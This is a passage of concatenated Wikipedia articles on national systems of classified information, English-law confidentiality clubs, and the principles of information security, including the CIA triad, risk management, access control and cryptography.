1981.[26]To access the information, a person must have the appropriate security clearance and the need to know. In addition, the caveat "Canadian Eyes Only" is used to restrict access to Classified or Protected information only to Canadian citizens with the appropriate security clearance and need to know.[27] SOI is not a classification of dataper se. It is defined under theSecurity of Information Act, and unauthorised release of such information constitutes a higher breach of trust, with a penalty of up to life imprisonment if the information is shared with a foreign entity or terrorist group. SOIs include: In February 2025, the Department of National Defence announced a new category of Persons Permanently Bound to Security (PPBS). The protection would apply to some units, sections or elements, and select positions (both current and former), with access to sensitive Special Operational Information (SOI) for national defense and intelligence work. If a unit or organization routinely handles SOI, all members of that unit will be automatically bound to secrecy. If an individual has direct access to SOI, deemed to be integral to national security, that person may be recommended for PPBS designation. The designation is for life, punishable by imprisonment.[28] Classified information can be designatedTop Secret,SecretorConfidential. These classifications are only used on matters of national interest. Protected information is not classified. It pertains to any sensitive information that does not relate to national security and cannot be disclosed under the access and privacy legislation because of the potential injury to particular public or private interests.[29][30] Federal Cabinet (King's Privy Council for Canada) papers are either protected (e.g., overhead slides prepared to make presentations to Cabinet) or classified (e.g., draft legislation, certain memos).[31] TheCriminal Lawof thePeople's Republic of China(which is not operative in the special administrative regions ofHong KongandMacau) makes it a crime to release a state secret. Regulation and enforcement is carried out by theNational Administration for the Protection of State Secrets. Under the 1989 "Law on Guarding State Secrets",[32]state secrets are defined as those that concern: Secrets can be classified into three categories: In France, classified information is defined by article 413-9 of the Penal Code.[34]The three levels of military classification are Less sensitive information is "protected". The levels are A further caveat,spécial France(reserved France) restricts the document to French citizens (in its entirety or by extracts). This is not a classification level. Declassification of documents can be done by theCommission consultative du secret de la défense nationale(CCSDN), an independent authority. Transfer of classified information is done with double envelopes, the outer layer being plastified and numbered, and the inner in strong paper. Reception of the document involves examination of the physical integrity of the container and registration of the document. In foreign countries, the document must be transferred through specialised military mail ordiplomatic bag. Transport is done by an authorised conveyor or habilitated person for mail under 20 kg. The letter must bear a seal mentioning "Par Valise Accompagnee-Sacoche". Once a year, ministers have an inventory of classified information and supports by competent authorities. Once their usage period is expired, documents are transferred to archives, where they are either destroyed (by incineration, crushing, or overvoltage), or stored. In case of unauthorized release of classified information, competent authorities are theMinistry of Interior, the 'Haut fonctionnaire de défense et de sécurité("high civil servant for defence and security") of the relevant ministry, and the General secretary for National Defence. Violation of such secrets is an offence punishable with seven years of imprisonment and a 100,000-euro fine; if the offence is committed by imprudence or negligence, the penalties are three years of imprisonment and a 45,000-euro fine. TheSecurity Bureauis responsible for developing policies in regards to the protection and handling of confidential government information. In general, the system used in Hong Kong is very similar to the UK system, developed from thecolonial era of Hong Kong. Four classifications exists in Hong Kong, from highest to lowest in sensitivity:[35] Restricted documents are not classifiedper se, but only those who have a need to know will have access to such information, in accordance with thePersonal Data (Privacy) Ordinance.[36] New Zealanduses the Restricted classification, which is lower than Confidential. People may be given access to Restricted information on the strength of an authorisation by their Head of department, without being subjected to the backgroundvettingassociated with Confidential, Secret and Top Secret clearances. New Zealand's security classifications and the national-harm requirements associated with their use are roughly similar to those of the United States. In addition to national security classifications there are two additional security classifications, In Confidence and Sensitive, which are used to protect information of a policy and privacy nature. There are also a number of information markings used within ministries and departments of the government, to indicate, for example, that information should not be released outside the originating ministry. Because of strict privacy requirements around personal information, personnel files are controlled in all parts of the public and private sectors. Information relating to the security vetting of an individual is usually classified at the In Confidence level. InRomania, classified information is referred to as "state secrets" (secrete de stat) and is defined by the Penal Code as "documents and data that manifestly appear to have this status or have been declared or qualified as such by decision of Government".[37]There are three levels of classification: "Secret" (Secret/S), "Top Secret" (Strict Secret/SS), and "Top Secret of Particular Importance" (Strict secret de interes deosebit/SSID).[38]The levels are set by theRomanian Intelligence Serviceand must be aligned with NATO regulations—in case of conflicting regulations, the latter are applied with priority. Dissemination of classified information to foreign agents or powers is punishable by up to life imprisonment, if such dissemination threatens Romania's national security.[39] In theRussian Federation, a state secret (Государственная тайна) is information protected by the state on its military, foreign policy, economic, intelligence, counterintelligence, operational and investigative and other activities, dissemination of which could harm state security. The Swedish classification has been updated due to increased NATO/PfP cooperation. All classified defence documents will now have both a Swedish classification (Kvalificerat hemlig,Hemlig,KonfidentiellorBegränsat Hemlig), and an English classification (Top Secret, Secret, Confidential, or Restricted).[citation needed]The termskyddad identitet, "protected identity", is used in the case of protection of a threatened person, basically implying "secret identity", accessible only to certain members of the police force and explicitly authorised officials. At the federal level, classified information in Switzerland is assigned one of three levels, which are from lowest to highest: Internal, Confidential, Secret.[40]Respectively, these are, in German,Intern,Vertraulich,Geheim; in French,Interne,Confidentiel,Secret; in Italian,Ad Uso Interno,Confidenziale,Segreto. As in other countries, the choice of classification depends on the potential impact that the unauthorised release of the classified document would have on Switzerland, the federal authorities or the authorities of a foreign government. According to the Ordinance on the Protection of Federal Information, information is classified as Internal if its "disclosure to unauthorised persons may be disadvantageous to national interests."[40]Information classified as Confidential could, if disclosed, compromise "the free formation of opinions and decision-making ofthe Federal Assemblyorthe Federal Council," jeopardise national monetary/economic policy, put the population at risk or adversely affect the operations of theSwiss Armed Forces. Finally, the unauthorised release of Secret information could seriously compromise the ability of either the Federal Assembly or the Federal Council to function or impede the ability of the Federal Government or the Armed Forces to act. According to the related regulations inTurkey, there are four levels of document classification:[41]çok gizli(top secret),gizli(secret),özel(confidential) andhizmete özel(restricted). The fifth istasnif dışı, which means unclassified. Until 2013, theUnited Kingdomused five levels of classification—from lowest to highest, they were: Protect, Restricted, Confidential, Secret and Top Secret (formerly Most Secret). TheCabinet Officeprovides guidance on how to protect information, including thesecurity clearancesrequired for personnel. Staff may be required to sign to confirm their understanding and acceptance of theOfficial Secrets Acts 1911 to 1989, although the Act applies regardless of signature. Protect is not in itself a security protective marking level (such as Restricted or greater), but is used to indicate information which should not be disclosed because, for instance, the document contains tax, national insurance, or other personal information. Government documents without a classification may be marked as Unclassified or Not Protectively Marked.[42] This system was replaced by theGovernment Security Classifications Policy, which has a simpler model: Top Secret, Secret, and Official from April 2014.[13]Official Sensitive is a security marking which may be followed by one of three authorised descriptors: Commercial, LocSen (location sensitive) or Personal. Secret and Top Secret may include a caveat such as UK Eyes Only. Also useful is that scientific discoveries may be classified via theD-Noticesystem if they are deemed to have applications relevant to national security. These may later emerge when technology improves so for example the specialised processors and routing engines used in graphics cards are loosely based on top secret military chips designed for code breaking and image processing. They may or may not have safeguards built in to generate errors when specific tasks are attempted and this is invariably independent of the card's operating system.[citation needed] The U.S. classification system is currently established underExecutive Order 13526and has three levels of classification—Confidential, Secret, and Top Secret. The U.S. had a Restricted level duringWorld War IIbut no longer does. U.S. regulations state that information received from other countries at the Restricted level should be handled as Confidential. A variety of markings are used for material that is not classified, but whose distribution is limited administratively or by other laws, e.g.,For Official Use Only(FOUO), orsensitive but unclassified(SBU). The Atomic Energy Act of 1954 provides for the protection of information related to the design of nuclear weapons. The term "Restricted Data" is used to denote certain nuclear technology. Information about the storage, use or handling of nuclear material or weapons is marked "Formerly Restricted Data". These designations are used in addition to level markings (Confidential, Secret and Top Secret). Information protected by the Atomic Energy Act is protected by law and information classified under the Executive Order is protected by Executive privilege. The U.S. government insists it is "not appropriate" for a court to question whether any document is legally classified.[43]In the1973 trial of Daniel Ellsberg for releasing the Pentagon Papers, the judge did not allow any testimony from Ellsberg, claiming it was "irrelevant", because the assigned classification could not be challenged. The charges against Ellsberg were ultimately dismissed after it was revealed that the government had broken the law in secretly breaking into the office of Ellsberg's psychiatrist and in tapping his telephone without a warrant. Ellsberg insists that the legal situation in the U.S. in 2014 is worse than it was in 1973, andEdward Snowdencould not get a fair trial.[44]TheState Secrets Protection Actof 2008 might have given judges the authority to review such questionsin camera, but the bill was not passed.[43] When a government agency acquires classified information through covert means, or designates a program as classified, the agency asserts "ownership" of that information and considers any public availability of it to be a violation of their ownership—even if the same information was acquired independently through "parallel reporting" by the press or others. For example, although theCIA drone programhas been widely discussed in public since the early 2000s, and reporters personally observed and reported on drone missile strikes, the CIA still considers the very existence of the program to be classified in its entirety, and any public discussion of it technically constitutes exposure of classified information. "Parallel reporting" was an issue in determining what constitutes "classified" information during theHillary Clinton email controversywhenAssistant Secretary of State for Legislative AffairsJulia Frifieldnoted, "When policy officials obtain information from open sources, 'think tanks,' experts, foreign government officials, or others, the fact that some of the information may also have been available through intelligence channels does not mean that the information is necessarily classified."[45][46][47] Strictly Secret and Confidential Secret Confidential Reserved US, French, EU, Japan "Confidential" marking to be handled as SECRET.[49] Top Secret Highly Secret Secret Internal Foreign Service:Fortroligt(thin black border) Top Secret Secret Confidential For Official Use Only Top Secret Secret Confidential Limited Use Top Secret Secret Confidential Restricted Distribution Absolute Secret Secret Confidential Service Document Class 1 Secret Class 2 Secret Class 3 Secret Confidential Philippines(Tagalog) Matinding Lihim Mahigpit na Lihim Lihim Ipinagbabawal Strict Secret of Special Importance Secret for Service Use Of Special Importance (variant: Completely Secret) Completely Secret (variant: Secret) Secret (variant: Not To Be Disclosed (Confidential)) For Official Use State Secret Strictly Confidential Confidential Internal Most Secret Very Secret Secret Restricted Top Secret Secret Confidential Restricted Table source:US Department of Defense(January 1995)."National Industrial Security Program - Operating Manual (DoD 5220.22-M)"(PDF). pp. B1 - B3 (PDF pages:121–123 ).Archived(PDF)from the original on 27 July 2019. Retrieved27 July2019. Privatecorporationsoften require writtenconfidentiality agreementsand conductbackground checkson candidates for sensitive positions.[53]In the U.S., theEmployee Polygraph Protection Actprohibits private employers from requiring lie detector tests, but there are a few exceptions. Policies dictating methods for marking and safeguarding company-sensitive information (e.g. "IBM Confidential") are common and some companies have more than one level. Such information is protected undertrade secretlaws. New product development teams are often sequestered and forbidden to share information about their efforts with un-cleared fellow employees, the originalApple Macintoshproject being a famous example. Other activities, such asmergersandfinancial reportpreparation generally involve similar restrictions. However, corporate security generally lacks the elaborate hierarchical clearance and sensitivity structures and the harsh criminal sanctions that give government classification systems their particular tone. TheTraffic Light Protocol[54][55]was developed by theGroup of Eightcountries to enable the sharing of sensitive information between government agencies and corporations. This protocol has now been accepted as a model for trusted information exchange by over 30 other countries. The protocol provides for four "information sharing levels" for the handling of sensitive information.
https://en.wikipedia.org/wiki/Classified_information
InEnglish legalproceedings, aconfidentiality club(also known asconfidentiality ring)[1]is an agreement occasionally reached by parties to alitigationto reduce the risk ofconfidentialdocuments being used outside the litigation. The agreement typically provides that only specified persons can access some documents. Setting up a confidentiality club "requires some degree of cooperation between the parties".[2]Confidentiality rings or clubs were described in 2012 as being increasingly common;[3]the case report onRoche Diagnostics Ltd. vMid Yorkshire Hospitals NHS Trust, apublic procurementdispute, also notes that they are "common in cases of this kind", and allow for specific disclosure of documents without causing the "difficulty relating to confidentiality" which would otherwise arise.[4] This article relating tolaw in the United Kingdom, or its constituent jurisdictions, is astub. You can help Wikipedia byexpanding it.
https://en.wikipedia.org/wiki/Confidentiality_club
Information securityis the practice of protectinginformationby mitigating information risks. It is part of information risk management.[1]It typically involves preventing or reducing the probability of unauthorized or inappropriate access todataor the unlawful use,disclosure, disruption, deletion, corruption, modification, inspection, recording, or devaluation of information. It also involves actions intended to reduce the adverse impacts of such incidents. Protected information may take any form, e.g., electronic or physical, tangible (e.g.,paperwork), or intangible (e.g.,knowledge).[2][3]Information security's primary focus is the balanced protection ofdata confidentiality,integrity, andavailability(also known as the 'CIA' triad)[4][5]while maintaining a focus on efficientpolicyimplementation, all without hampering organizationproductivity.[6]This is largely achieved through a structuredrisk managementprocess.[7] To standardize this discipline, academics and professionals collaborate to offer guidance, policies, and industry standards onpasswords,antivirus software,firewalls,encryption software,legal liability,security awarenessand training, and so forth.[8]Thisstandardizationmay be further driven by a wide variety of laws and regulations that affect how data is accessed, processed, stored, transferred, and destroyed.[9] While paper-based business operations are still prevalent, requiring their own set of information security practices, enterprise digital initiatives are increasingly being emphasized,[10][11]withinformation assurancenow typically being dealt with by information technology (IT) security specialists. These specialists apply information security to technology (most often some form of computer system). IT security specialists are almost always found in any major enterprise/establishment due to the nature and value of the data within larger businesses.[12]They are responsible for keeping all of thetechnologywithin the company secure from malicious attacks that often attempt to acquire critical private information or gain control of the internal systems.[13][14] There are many specialist roles in Information Security including securing networks and alliedinfrastructure, securingapplicationsanddatabases,security testing, information systemsauditing,business continuity planning, electronic record discovery, anddigital forensics.[15] Information security standards are techniques generally outlined in published materials that attempt to protect the information of a user or organization.[16]This environment includes users themselves, networks, devices, all software, processes, information in storage or transit, applications, services, and systems that can be connected directly or indirectly to networks. The principal objective is to reduce the risks, including preventing or mitigating attacks. These published materials consist of tools, policies, security concepts, security safeguards, guidelines, risk management approaches, actions, training, best practices, assurance and technologies. Various definitions of information security are suggested below, summarized from different sources: Information securitythreatscome in many different forms.[27]Some of the most common threats today are software attacks, theft of intellectual property, theft of identity, theft of equipment or information, sabotage, and information extortion.[28][29]Viruses,[30]worms,phishing attacks, andTrojan horsesare a few common examples of software attacks. Thetheft of intellectual propertyhas also been an extensive issue for many businesses.[31]Identity theftis the attempt to act as someone else usually to obtain that person's personal information or to take advantage of their access to vital information throughsocial engineering.[32][33]Sabotageusually consists of the destruction of an organization'swebsitein an attempt to cause loss of confidence on the part of its customers.[34]Information extortion consists of theft of a company's property or information as an attempt to receive a payment in exchange for returning the information or property back to its owner, as withransomware.[35]One of the most functional precautions against these attacks is to conduct periodical user awareness.[36] Governments,military,corporations,financial institutions,hospitals, non-profit organizations, and privatebusinessesamass a great deal of confidential information about their employees, customers, products, research, and financial status.[37]Should confidential information about a business's customers or finances or new product line fall into the hands of a competitor orhacker, a business and its customers could suffer widespread, irreparable financial loss, as well as damage to the company's reputation.[38]From a business perspective, information security must be balanced against cost; theGordon-Loeb Modelprovides a mathematical economic approach for addressing this concern.[39] For the individual, information security has a significant effect onprivacy, which is viewed very differently in variouscultures.[40] Since the early days of communication, diplomats and military commanders understood that it was necessary to provide some mechanism to protect the confidentiality of correspondence and to have some means of detectingtampering.[41]Julius Caesaris credited with the invention of theCaesar cipherc. 50 B.C., which was created in order to prevent his secret messages from being read should a message fall into the wrong hands.[42]However, for the most part protection was achieved through the application of procedural handling controls.[43][44]Sensitive information was marked up to indicate that it should be protected and transported by trusted persons, guarded and stored in a secure environment or strong box.[45]As postal services expanded, governments created official organizations to intercept, decipher, read, and reseal letters (e.g., the U.K.'s Secret Office, founded in 1653[46]). In the mid-nineteenth century more complexclassification systemswere developed to allow governments to manage their information according to the degree of sensitivity.[47]For example, the British Government codified this, to some extent, with the publication of theOfficial Secrets Actin 1889.[48]Section 1 of the law concerned espionage and unlawful disclosures of information, while Section 2 dealt with breaches of official trust.[49]A public interest defense was soon added to defend disclosures in the interest of the state.[50]A similar law was passed in India in 1889, The Indian Official Secrets Act, which was associated with the British colonial era and used to crack down on newspapers that opposed the Raj's policies.[51]A newer version was passed in 1923 that extended to all matters of confidential or secret information for governance.[52]By the time of theFirst World War, multi-tier classification systems were used to communicate information to and from various fronts, which encouraged greater use of code making and breaking sections in diplomatic and military headquarters.[53]Encoding became more sophisticated between the wars as machines were employed to scramble and unscramble information.[54] The establishment ofcomputer securityinaugurated the history of information security. The need for such appeared duringWorld War II.[55]The volume of information shared by the Allied countries during the Second World War necessitated formal alignment of classification systems and procedural controls.[56]An arcane range of markings evolved to indicate who could handle documents (usually officers rather than enlisted troops) and where they should be stored as increasingly complex safes and storage facilities were developed.[57]TheEnigma Machine, which was employed by the Germans to encrypt the data of warfare and was successfully decrypted byAlan Turing, can be regarded as a striking example of creating and using secured information.[58]Procedures evolved to ensure documents were destroyed properly, and it was the failure to follow these procedures which led to some of the greatest intelligence coups of the war (e.g., the capture ofU-570[58]). Variousmainframe computerswere connected online during theCold Warto complete more sophisticated tasks, in a communication process easier than mailingmagnetic tapesback and forth by computer centers. As such, theAdvanced Research Projects Agency(ARPA), of theUnited States Department of Defense, started researching the feasibility of a networked system of communication to trade information within theUnited States Armed Forces. In 1968, theARPANETproject was formulated byLarry Roberts, which would later evolve into what is known as theinternet.[59] In 1973, important elements of ARPANET security were found by internet pioneerRobert Metcalfeto have many flaws such as the: "vulnerability of password structure and formats; lack of safety procedures fordial-up connections; and nonexistent user identification and authorizations", aside from the lack of controls and safeguards to keep data safe from unauthorized access. Hackers had effortless access to ARPANET, as phone numbers were known by the public.[60]Due to these problems, coupled with the constant violation of computer security, as well as the exponential increase in the number of hosts and users of the system, "network security" was often alluded to as "network insecurity".[60] The end of the twentieth century and the early years of the twenty-first century saw rapid advancements intelecommunications, computinghardwareandsoftware, and dataencryption.[61]The availability of smaller, more powerful, and less expensive computing equipment madeelectronic data processingwithin the reach ofsmall businessand home users.[62]The establishment of Transfer Control Protocol/Internetwork Protocol (TCP/IP) in the early 1980s enabled different types of computers to communicate.[63]These computers quickly became interconnected through theinternet.[64] The rapid growth and widespread use of electronic data processing andelectronic businessconducted through the internet, along with numerous occurrences of internationalterrorism, fueled the need for better methods of protecting the computers and the information they store, process, and transmit.[65]The academic disciplines ofcomputer securityandinformation assuranceemerged along with numerous professional organizations, all sharing the common goals of ensuring the security and reliability ofinformation systems.[66] The "CIA triad" ofconfidentiality,integrity, andavailabilityis at the heart of information security.[67]The concept was introduced in the Anderson Report in 1972 and later repeated inThe Protection of Information in Computer Systems.The abbreviation was coined by Steve Lipner around 1986.[68] Debate continues about whether or not this triad is sufficient to address rapidly changing technology and business requirements, with recommendations to consider expanding on the intersections between availability and confidentiality, as well as the relationship between security and privacy.[4]Other principles such as "accountability" have sometimes been proposed; it has been pointed out that issues such asnon-repudiationdo not fit well within the three core concepts.[69] In information security,confidentiality"is the property, that information is not made available or disclosed to unauthorized individuals, entities, or processes."[70]While similar to "privacy", the two words are not interchangeable. Rather, confidentiality is a component of privacy that implements to protect our data from unauthorized viewers.[71]Examples of confidentiality of electronic data being compromised include laptop theft, password theft, or sensitive emails being sent to the incorrect individuals.[72] In IT security,data integritymeans maintaining and assuring the accuracy and completeness of data over its entire lifecycle.[73]This means that data cannot be modified in an unauthorized or undetected manner.[74]This is not the same thing asreferential integrityindatabases, although it can be viewed as a special case of consistency as understood in the classicACIDmodel oftransaction processing.[75]Information security systems typically incorporate controls to ensure their own integrity, in particular protecting the kernel or core functions against both deliberate and accidental threats.[76]Multi-purpose and multi-user computer systems aim to compartmentalize the data and processing such that no user or process can adversely impact another: the controls may not succeed however, as we see in incidents such as malware infections, hacks, data theft, fraud, and privacy breaches.[77] More broadly, integrity is an information security principle that involves human/social, process, and commercial integrity, as well as data integrity. As such it touches on aspects such as credibility, consistency, truthfulness, completeness, accuracy, timeliness, and assurance.[78] For any information system to serve its purpose, the information must beavailablewhen it is needed.[79]This means the computing systems used to store and process the information, thesecurity controlsused to protect it, and the communication channels used to access it must be functioning correctly.[80]High availabilitysystems aim to remain available at all times, preventing service disruptions due to power outages, hardware failures, and system upgrades.[81]Ensuring availability also involves preventingdenial-of-service attacks, such as a flood of incoming messages to the target system, essentially forcing it to shut down.[82] In the realm of information security, availability can often be viewed as one of the most important parts of a successful information security program.[citation needed]Ultimately end-users need to be able to perform job functions; by ensuring availability an organization is able to perform to the standards that an organization's stakeholders expect.[83]This can involve topics such as proxy configurations, outside web access, the ability to access shared drives and the ability to send emails.[84]Executives oftentimes do not understand the technical side of information security and look at availability as an easy fix, but this often requires collaboration from many different organizational teams, such as network operations, development operations, incident response, and policy/change management.[85]A successful information security team involves many different key roles to mesh and align for the "CIA" triad to be provided effectively.[86] In addition to the classic CIA triad of security goals, some organisations may want to include security goals like authenticity, accountability, non-repudiation, and reliability. In law,non-repudiationimplies one's intention to fulfill their obligations to a contract. It also implies that one party of a transaction cannot deny having received a transaction, nor can the other party deny having sent a transaction.[87] It is important to note that while technology such as cryptographic systems can assist in non-repudiation efforts, the concept is at its core a legal concept transcending the realm of technology.[88]It is not, for instance, sufficient to show that the message matches a digital signature signed with the sender's private key, and thus only the sender could have sent the message, and nobody else could have altered it in transit (data integrity).[89]The alleged sender could in return demonstrate that the digital signature algorithm is vulnerable or flawed, or allege or prove that his signing key has been compromised.[90]The fault for these violations may or may not lie with the sender, and such assertions may or may not relieve the sender of liability, but the assertion would invalidate the claim that the signature necessarily proves authenticity and integrity. As such, the sender may repudiate the message (because authenticity and integrity are pre-requisites for non-repudiation).[91] In 1992 and revised in 2002, theOECD'sGuidelines for the Security of Information Systems and Networks[92]proposed the nine generally accepted principles:awareness, responsibility, response, ethics, democracy, risk assessment, security design and implementation, security management, and reassessment.[93]Building upon those, in 2004 theNIST'sEngineering Principles for Information Technology Security[69]proposed 33 principles. In 1998,Donn Parkerproposed an alternative model for the classic "CIA" triad that he called thesix atomic elements of information. The elements areconfidentiality,possession,integrity,authenticity,availability, andutility. The merits of theParkerian Hexadare a subject of debate amongst security professionals.[94] In 2011,The Open Grouppublished the information security management standardO-ISM3.[95]This standard proposed anoperational definitionof the key concepts of security, with elements called "security objectives", related toaccess control(9),availability(3),data quality(1), compliance, and technical (4). Risk is the likelihood that something bad will happen that causes harm to an informational asset (or the loss of the asset).[96]A vulnerability is a weakness that could be used to endanger or cause harm to an informational asset. A threat is anything (man-made oract of nature) that has the potential to cause harm.[97]The likelihood that a threat will use a vulnerability to cause harm creates a risk. When a threat does use a vulnerability to inflict harm, it has an impact.[98]In the context of information security, the impact is a loss of availability, integrity, and confidentiality, and possibly other losses (lost income, loss of life, loss of real property).[99] TheCertified Information Systems Auditor(CISA) Review Manual 2006definesrisk managementas "the process of identifyingvulnerabilitiesandthreatsto the information resources used by an organization in achieving business objectives, and deciding whatcountermeasures,[100]if any, to take in reducing risk to an acceptable level, based on the value of the information resource to the organization."[101] There are two things in this definition that may need some clarification. First, theprocessof risk management is an ongoing, iterativeprocess. It must be repeated indefinitely. The business environment is constantly changing and newthreatsandvulnerabilitiesemerge every day.[102]Second, the choice ofcountermeasures(controls) used to manage risks must strike a balance between productivity, cost, effectiveness of the countermeasure, and the value of the informational asset being protected.[103]Furthermore, these processes have limitations as security breaches are generally rare and emerge in a specific context which may not be easily duplicated.[104]Thus, any process and countermeasure should itself be evaluated for vulnerabilities.[105]It is not possible to identify all risks, nor is it possible to eliminate all risk. The remaining risk is called "residual risk".[106] Arisk assessmentis carried out by a team of people who have knowledge of specific areas of the business.[107]Membership of the team may vary over time as different parts of the business are assessed.[108]The assessment may use a subjective qualitative analysis based on informed opinion, or where reliable dollar figures and historical information is available, the analysis may usequantitativeanalysis. Research has shown that the most vulnerable point in most information systems is the human user, operator, designer, or other human.[109]TheISO/IEC 27002:2005Code of practice forinformation security managementrecommends the following be examined during a risk assessment: In broad terms, the risk management process consists of:[110][111] For any given risk, management can choose to accept the risk based upon the relative low value of the asset, the relative low frequency of occurrence, and the relative low impact on the business.[118]Or, leadership may choose to mitigate the risk by selecting and implementing appropriate control measures to reduce the risk. In some cases, the risk can be transferred to another business by buying insurance or outsourcing to another business.[119]The reality of some risks may be disputed. In such cases leadership may choose to deny the risk.[120] Selecting and implementing proper security controls will initially help an organization bring down risk to acceptable levels.[121]Control selection should follow and should be based on the risk assessment.[122]Controls can vary in nature, but fundamentally they are ways of protecting the confidentiality, integrity or availability of information.ISO/IEC 27001has defined controls in different areas.[123]Organizations can implement additional controls according to requirement of the organization.[124]ISO/IEC 27002offers a guideline for organizational information security standards.[125] Defense in depth is a fundamental security philosophy that relies on overlapping security systems designed to maintain protection even if individual components fail. Rather than depending on a single security measure, it combines multiple layers of security controls both in the cloud and at network endpoints. This approach includes combinations like firewalls with intrusion-detection systems, email filtering services with desktop anti-virus, and cloud-based security alongside traditional network defenses.[126]The concept can be implemented through three distinct layers of administrative, logical, and physical controls,[127]or visualized as an onion model with data at the core, surrounded by people, network security, host-based security, and application security layers.[128]The strategy emphasizes that security involves not just technology, but also people and processes working together, with real-time monitoring and response being crucial components.[126] An important aspect of information security and risk management is recognizing the value of information and defining appropriate procedures and protection requirements for the information.[129]Not all information is equal and so not all information requires the same degree of protection.[130]This requires information to be assigned asecurity classification.[131]The first step in information classification is to identify a member of senior management as the owner of the particular information to be classified. Next, develop a classification policy.[132]The policy should describe the different classification labels, define the criteria for information to be assigned a particular label, and list the requiredsecurity controlsfor each classification.[133] Some factors that influence which classification information should be assigned include how much value that information has to the organization, how old the information is and whether or not the information has become obsolete.[134]Laws and other regulatory requirements are also important considerations when classifying information.[135]TheInformation Systems Audit and Control Association(ISACA) and itsBusiness Model for Information Securityalso serves as a tool for security professionals to examine security from a systems perspective, creating an environment where security can be managed holistically, allowing actual risks to be addressed.[136] The type of information security classification labels selected and used will depend on the nature of the organization, with examples being:[133] All employees in the organization, as well as business partners, must be trained on the classification schema and understand the required security controls and handling procedures for each classification.[139]The classification of a particular information asset that has been assigned should be reviewed periodically to ensure the classification is still appropriate for the information and to ensure the security controls required by the classification are in place and are followed in their right procedures.[140] Access to protected information must be restricted to people who are authorized to access the information.[141]The computer programs, and in many cases the computers that process the information, must also be authorized.[142]This requires that mechanisms be in place to control the access to protected information.[142]The sophistication of the access control mechanisms should be in parity with the value of the information being protected; the more sensitive or valuable the information the stronger the control mechanisms need to be.[143]The foundation on which access control mechanisms are built start with identification andauthentication.[144] Access control is generally considered in three steps: identification,authentication, andauthorization.[145][72] Identification is an assertion of who someone is or what something is. If a person makes the statement "Hello, my name isJohn Doe" they are making a claim of who they are.[146]However, their claim may or may not be true. Before John Doe can be granted access to protected information it will be necessary to verify that the person claiming to be John Doe really is John Doe.[147]Typically the claim is in the form of a username. By entering that username you are claiming "I am the person the username belongs to".[148] Authentication is the act of verifying a claim of identity. When John Doe goes into a bank to make a withdrawal, he tells thebank tellerhe is John Doe, a claim of identity.[149]The bank teller asks to see a photo ID, so he hands the teller hisdriver's license.[150]The bank teller checks the license to make sure it has John Doe printed on it and compares the photograph on the license against the person claiming to be John Doe.[151]If the photo and name match the person, then the teller has authenticated that John Doe is who he claimed to be. Similarly, by entering the correct password, the user is providing evidence that he/she is the person the username belongs to.[152] There are three different types of information that can be used for authentication:[153][154] Strong authentication requires providing more than one type of authentication information (two-factor authentication).[160]Theusernameis the most common form of identification on computer systems today and the password is the most common form of authentication.[161]Usernames and passwords have served their purpose, but they are increasingly inadequate.[162]Usernames and passwords are slowly being replaced or supplemented with more sophisticated authentication mechanisms such astime-based one-time password algorithms.[163] After a person, program or computer has successfully been identified and authenticated then it must be determined what informational resources they are permitted to access and what actions they will be allowed to perform (run, view, create, delete, or change).[164]This is calledauthorization. Authorization to access information and other computing services begins with administrative policies and procedures.[165]The policies prescribe what information and computing services can be accessed, by whom, and under what conditions. The access control mechanisms are then configured to enforce these policies.[166]Different computing systems are equipped with different kinds of access control mechanisms. Some may even offer a choice of different access control mechanisms.[167]The access control mechanism a system offers will be based upon one of three approaches to access control, or it may be derived from a combination of the three approaches.[72] The non-discretionary approach consolidates all access control under a centralized administration.[168]The access to information and other resources is usually based on the individuals function (role) in the organization or the tasks the individual must perform.[169][170]The discretionary approach gives the creator or owner of the information resource the ability to control access to those resources.[168]In the mandatory access control approach, access is granted or denied basing upon the security classification assigned to the information resource.[141] Examples of common access control mechanisms in use today includerole-based access control, available in many advanced database management systems; simplefile permissionsprovided in the UNIX and Windows operating systems;[171]Group Policy Objectsprovided in Windows network systems; andKerberos,RADIUS,TACACS, and the simple access lists used in manyfirewallsandrouters.[172] To be effective, policies and other security controls must be enforceable and upheld. Effective policies ensure that people are held accountable for their actions.[173]TheU.S. Treasury's guidelines for systems processing sensitive or proprietary information, for example, states that all failed and successful authentication and access attempts must be logged, and all access to information must leave some type ofaudit trail.[174] Also, the need-to-know principle needs to be in effect when talking about access control. This principle gives access rights to a person to perform their job functions.[175]This principle is used in the government when dealing with difference clearances.[176]Even though two employees in different departments have atop-secret clearance, they must have a need-to-know in order for information to be exchanged. Within the need-to-know principle, network administrators grant the employee the least amount of privilege to prevent employees from accessing more than what they are supposed to.[177]Need-to-know helps to enforce the confidentiality-integrity-availability triad. Need-to-know directly impacts the confidential area of the triad.[178] Information security usescryptographyto transform usable information into a form that renders it unusable by anyone other than an authorized user; this process is calledencryption.[179]Information that has been encrypted (rendered unusable) can be transformed back into its original usable form by an authorized user who possesses thecryptographic key, through the process of decryption.[180]Cryptography is used in information security to protect information from unauthorized or accidental disclosure while theinformationis in transit (either electronically or physically) and while information is in storage.[72] Cryptography provides information security with other useful applications as well, including improved authentication methods, message digests, digital signatures,non-repudiation, and encrypted network communications.[181]Older, less secure applications such asTelnetandFile Transfer Protocol(FTP) are slowly being replaced with more secure applications such asSecure Shell(SSH) that use encrypted network communications.[182]Wireless communications can be encrypted using protocols such asWPA/WPA2or the older (and less secure)WEP. Wired communications (such asITU‑TG.hn) are secured usingAESfor encryption andX.1035for authentication and key exchange.[183]Software applications such asGnuPGorPGPcan be used to encrypt data files and email.[184] Cryptography can introduce security problems when it is not implemented correctly.[185]Cryptographic solutions need to be implemented using industry-accepted solutions that have undergone rigorous peer review by independent experts in cryptography.[186]Thelength and strengthof the encryption key is also an important consideration.[187]A key that isweakor too short will produceweak encryption.[187]The keys used for encryption and decryption must be protected with the same degree of rigor as any other confidential information.[188]They must be protected from unauthorized disclosure and destruction, and they must be available when needed.[citation needed]Public key infrastructure(PKI) solutions address many of the problems that surroundkey management.[72] U.S.Federal Sentencing Guidelinesnow make it possible to hold corporate officers liable for failing to exercise due care and due diligence in the management of their information systems.[189] In the field of information security, Harris[190]offers the following definitions of due care and due diligence: "Due care are steps that are taken to show that a company has taken responsibility for the activities that take place within the corporation and has taken the necessary steps to help protect the company, its resources, and employees[191]."And, [Due diligence are the]"continual activities that make sure the protection mechanisms are continually maintained and operational."[192] Attention should be made to two important points in these definitions.[193][194]First, in due care, steps are taken to show; this means that the steps can be verified, measured, or even produce tangible artifacts.[195][196]Second, in due diligence, there are continual activities; this means that people are actually doing things to monitor and maintain the protection mechanisms, and these activities are ongoing.[197] Organizations have a responsibility with practicing duty of care when applying information security. The 